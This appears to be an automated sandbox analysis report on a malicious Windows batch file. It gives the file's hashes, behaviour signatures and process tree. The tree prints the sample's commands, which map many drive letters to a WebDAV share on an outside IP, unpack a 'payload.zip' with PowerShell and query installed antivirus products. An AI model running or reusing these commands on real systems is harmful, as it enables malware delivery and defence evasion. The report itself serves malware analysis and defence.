Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
12/10/2023, 00:51
Static task
static1
Behavioral task
behavioral1
Sample
5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat
Resource
win10v2004-20230915-en
General
-
Target
5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat
-
Size
1KB
-
MD5
3e04fa57bc1837dd6eb1ddfaaa0c8fb3
-
SHA1
52c4646dd2796cb4da7a50f6777e3a18f9d48179
-
SHA256
5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4
-
SHA512
d6679d25b561ff1162a9efffea72deff19e5b1b5a4fe74c5fca590fa1df276f0e24ae6f838a7fc5751533c15553c99c94fec2d3d86d4f6823c1579a9438f0bc6
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: net.exe File opened (read-only) \??\G: net.exe File opened (read-only) \??\E: net.exe File opened (read-only) \??\L: net.exe File opened (read-only) \??\K: net.exe File opened (read-only) \??\T: net.exe File opened (read-only) \??\Q: net.exe File opened (read-only) \??\H: net.exe File opened (read-only) \??\B: net.exe File opened (read-only) \??\A: net.exe File opened (read-only) \??\Y: net.exe File opened (read-only) \??\X: net.exe File opened (read-only) \??\V: net.exe File opened (read-only) \??\U: net.exe File opened (read-only) \??\S: net.exe File opened (read-only) \??\R: net.exe File opened (read-only) \??\P: net.exe File opened (read-only) \??\O: net.exe File opened (read-only) \??\N: net.exe File opened (read-only) \??\Z: net.exe File opened (read-only) \??\W: net.exe File opened (read-only) \??\M: net.exe File opened (read-only) \??\I: net.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeDebugPrivilege 2588 powershell.exe Token: SeIncreaseQuotaPrivilege 1820 WMIC.exe Token: SeSecurityPrivilege 1820 WMIC.exe Token: SeTakeOwnershipPrivilege 1820 WMIC.exe Token: SeLoadDriverPrivilege 1820 WMIC.exe Token: SeSystemProfilePrivilege 1820 WMIC.exe Token: SeSystemtimePrivilege 1820 WMIC.exe Token: SeProfSingleProcessPrivilege 1820 WMIC.exe Token: SeIncBasePriorityPrivilege 1820 WMIC.exe Token: SeCreatePagefilePrivilege 1820 WMIC.exe Token: SeBackupPrivilege 1820 WMIC.exe Token: SeRestorePrivilege 1820 WMIC.exe Token: SeShutdownPrivilege 1820 WMIC.exe Token: SeDebugPrivilege 1820 WMIC.exe Token: SeSystemEnvironmentPrivilege 1820 WMIC.exe Token: SeRemoteShutdownPrivilege 1820 WMIC.exe Token: SeUndockPrivilege 1820 WMIC.exe Token: SeManageVolumePrivilege 1820 WMIC.exe Token: 33 1820 WMIC.exe Token: 34 1820 WMIC.exe Token: 35 1820 WMIC.exe Token: SeIncreaseQuotaPrivilege 1820 WMIC.exe Token: SeSecurityPrivilege 1820 WMIC.exe Token: SeTakeOwnershipPrivilege 1820 WMIC.exe Token: SeLoadDriverPrivilege 1820 WMIC.exe Token: SeSystemProfilePrivilege 1820 WMIC.exe Token: SeSystemtimePrivilege 1820 WMIC.exe Token: SeProfSingleProcessPrivilege 1820 WMIC.exe Token: SeIncBasePriorityPrivilege 1820 WMIC.exe Token: SeCreatePagefilePrivilege 1820 WMIC.exe Token: SeBackupPrivilege 1820 WMIC.exe Token: SeRestorePrivilege 1820 WMIC.exe Token: SeShutdownPrivilege 1820 WMIC.exe Token: SeDebugPrivilege 1820 WMIC.exe Token: SeSystemEnvironmentPrivilege 1820 WMIC.exe Token: SeRemoteShutdownPrivilege 1820 WMIC.exe Token: SeUndockPrivilege 1820 WMIC.exe Token: SeManageVolumePrivilege 1820 WMIC.exe Token: 33 1820 WMIC.exe Token: 34 1820 WMIC.exe Token: 35 1820 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3068 wrote to memory of 652 3068 cmd.exe 29 PID 3068 wrote to memory of 652 3068 cmd.exe 29 PID 3068 wrote to memory of 652 3068 cmd.exe 29 PID 652 wrote to memory of 1716 652 cmd.exe 31 PID 652 wrote to memory of 1716 652 cmd.exe 31 PID 652 wrote to memory of 1716 652 cmd.exe 31 PID 652 wrote to memory of 1700 652 cmd.exe 32 PID 652 wrote to memory of 1700 652 cmd.exe 32 PID 652 wrote to memory of 1700 652 cmd.exe 32 PID 652 wrote to memory of 2024 652 cmd.exe 33 PID 652 wrote to memory of 2024 652 cmd.exe 33 PID 652 wrote to memory of 2024 652 cmd.exe 33 PID 652 wrote to memory of 2108 652 cmd.exe 34 PID 652 wrote to memory of 2108 652 cmd.exe 34 PID 652 wrote to memory of 2108 652 cmd.exe 34 PID 652 wrote to memory of 1028 652 cmd.exe 35 PID 652 wrote to memory of 1028 652 cmd.exe 35 PID 652 wrote to memory of 1028 652 cmd.exe 35 PID 652 wrote to memory of 1768 652 cmd.exe 36 PID 652 wrote to memory of 1768 652 cmd.exe 36 PID 652 wrote to memory of 1768 652 cmd.exe 36 PID 652 wrote to memory of 2940 652 cmd.exe 37 PID 652 wrote to memory of 2940 652 cmd.exe 37 PID 652 wrote to memory of 2940 652 cmd.exe 37 PID 652 wrote to memory of 2608 652 cmd.exe 38 PID 652 wrote to memory of 2608 652 cmd.exe 38 PID 652 wrote to memory of 2608 652 cmd.exe 38 PID 652 wrote to memory of 2404 652 cmd.exe 39 PID 652 wrote to memory of 2404 652 cmd.exe 39 PID 652 wrote to memory of 2404 652 cmd.exe 39 PID 652 wrote to memory of 2004 652 cmd.exe 40 PID 652 wrote to memory of 2004 652 cmd.exe 40 PID 652 wrote to memory of 2004 652 cmd.exe 40 PID 652 wrote to memory of 2616 652 cmd.exe 41 PID 652 wrote to memory of 2616 652 cmd.exe 41 PID 652 wrote to memory of 2616 652 cmd.exe 41 PID 652 wrote to memory of 2620 652 cmd.exe 42 PID 652 wrote to memory of 2620 652 cmd.exe 42 PID 652 wrote to memory of 2620 652 cmd.exe 42 PID 652 wrote to memory of 2820 652 cmd.exe 43 PID 652 wrote to memory of 2820 652 cmd.exe 43 PID 652 wrote to memory of 2820 652 cmd.exe 43 PID 652 wrote to memory of 2780 652 cmd.exe 44 PID 652 wrote to memory of 2780 652 cmd.exe 44 PID 652 wrote to memory of 2780 652 cmd.exe 44 PID 652 wrote to memory of 2712 652 cmd.exe 45 PID 652 wrote to memory of 2712 652 cmd.exe 45 PID 652 wrote to memory of 2712 652 cmd.exe 45 PID 652 wrote to memory of 2956 652 cmd.exe 46 PID 652 wrote to memory of 2956 652 cmd.exe 46 PID 652 wrote to memory of 2956 652 cmd.exe 46 PID 652 wrote to memory of 2804 652 cmd.exe 47 PID 652 wrote to memory of 2804 652 cmd.exe 47 PID 652 wrote to memory of 2804 652 cmd.exe 47 PID 652 wrote to memory of 2552 652 cmd.exe 48 PID 652 wrote to memory of 2552 652 cmd.exe 48 PID 652 wrote to memory of 2552 652 cmd.exe 48 PID 652 wrote to memory of 2740 652 cmd.exe 49 PID 652 wrote to memory of 2740 652 cmd.exe 49 PID 652 wrote to memory of 2740 652 cmd.exe 49 PID 652 wrote to memory of 2000 652 cmd.exe 50 PID 652 wrote to memory of 2000 652 cmd.exe 50 PID 652 wrote to memory of 2000 652 cmd.exe 50 PID 652 wrote to memory of 2648 652 cmd.exe 51
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat min2⤵
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\system32\net.exenet use Z: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:1716
-
-
C:\Windows\system32\net.exenet use Y: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:1700
-
-
C:\Windows\system32\net.exenet use X: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2024
-
-
C:\Windows\system32\net.exenet use W: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2108
-
-
C:\Windows\system32\net.exenet use V: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:1028
-
-
C:\Windows\system32\net.exenet use U: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:1768
-
-
C:\Windows\system32\net.exenet use T: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2940
-
-
C:\Windows\system32\net.exenet use S: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2608
-
-
C:\Windows\system32\net.exenet use R: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2404
-
-
C:\Windows\system32\net.exenet use Q: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2004
-
-
C:\Windows\system32\net.exenet use P: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2616
-
-
C:\Windows\system32\net.exenet use O: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2620
-
-
C:\Windows\system32\net.exenet use N: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2820
-
-
C:\Windows\system32\net.exenet use M: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2780
-
-
C:\Windows\system32\net.exenet use L: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2712
-
-
C:\Windows\system32\net.exenet use K: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2956
-
-
C:\Windows\system32\net.exenet use J: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2804
-
-
C:\Windows\system32\net.exenet use I: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2552
-
-
C:\Windows\system32\net.exenet use H: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2740
-
-
C:\Windows\system32\net.exenet use G: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2000
-
-
C:\Windows\system32\net.exenet use F: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵PID:2648
-
-
C:\Windows\system32\net.exenet use E: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2680
-
-
C:\Windows\system32\net.exenet use D: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵PID:2624
-
-
C:\Windows\system32\net.exenet use C: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵PID:2516
-
-
C:\Windows\system32\net.exenet use B: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2528
-
-
C:\Windows\system32\net.exenet use A: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'C:\Users\Admin\Pictures\payload.zip' -DestinationPath 'C:\Users\Admin\Pictures\' -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Windows\system32\net.exenet use /delete3⤵PID:852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 use /delete4⤵PID:1440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value3⤵PID:2860
-
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1820
-
-
-